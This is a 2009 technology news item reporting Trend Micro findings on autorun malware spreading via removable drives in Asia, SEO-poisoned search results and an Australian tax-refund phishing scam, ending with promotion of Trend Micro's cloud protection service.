Advertisment

'Autorun malware emerge most dangerous'

author-image
CIOL Bureau
Updated On
New Update

Advertisment

NEW DELHI, INDIA: Trend Micro researchers have detected that in the first two quarters of 2009, most Asian countries have autorun malware as their top infectors, the highest concentration compared to other regions in the world.

Autorun malware mainly spreads through removable devices.

Trend Micro research uncovered two variants of the MAL_OTORUN malware that manifest behavior and characteristics that are similar to computer worms that exploit autorun vulnerabilities in the Windows operating system. The malware may go undetected by an unsuspecting user and be downloaded unknowingly when visiting malicious Web sites.

Advertisment

The malware relies on the autorun or autoplay feature in Windows XP and Vista. This feature enables removable media such as CDs and removable drives to start automatically upon insertion or connection to the system.

MAL_OTORUN1

MAL_OTORUN1 and MAL_OTORUN2 usually infect computers by dropping a copy of themselves on physical and removable drives. The number of infections in Asia-Pacific amounted to 92,773,402 and 127,902,379 respectively since 2008.

Advertisment

Malware related to online games also increased in the second quarter of 2009, especially in China. As China has a large online gaming population it consequently showed a high percentage of games related spyware.

Another growing trend among cybercriminals is the use of search engine optimization (SEO) techniques in which they manage to insert popular news items in search engines and make them appear as top search results. Actually the results are malicious links to harmful Web sites.

In the past months, cybercriminals took advantage of the rumors surrounding Michael Jackson’s death or the H1N1 flu pandemic to end up among the top search results in all major search engines. “All these the Web searches yielded links that triggered multiple redirections to various malicious sites, which ultimately lead to the download of rogue antivirus software. We advise users to be very carefully when clicking links in top search results in major search engines”, commented Amit Nath, Country Manager, India & SAARC, Trend Micro.

As for spam, one significant phishing attack put Australian taxpayers at risk of having their personal details stolen by cybercriminals. Spammers used a phishing e-mail that pretended to be the latest call of the Australian Taxation Office (ATO) on people to lodge their 2008 tax returns. The e-mail entices the receiver into believing that he or she is eligible to receive a tax refund and then asks the recipient to answer the form attached to the e-mail, click the Print button, and send it to the head office.

Advertisment

The form uses double extension names: .PDF.HTM and tricks the users into thinking that they are filling in a PDF file. In reality, the form conceals an HTML page which connects to a malicious site. Oddly enough, the form asks for the user’s credit card number and PIN code, which should be irrelevant if this would indeed concern a tax return.

The volume and sophistication of these threats make it imperative that multilayered, real-time protection is used to ensure online safety. The Trend Micro Smart Protection Network, which powers most of Trend Micro's products and solutions, correlates Web and e-mail threat data by using reputation technologies that compare threats against in-the-cloud threat databases. This unique type of cloud-client security infrastructure gives Trend Micro customers real-time protection against the latest Internet threats, while enjoying online activities to the fullest.

tech-news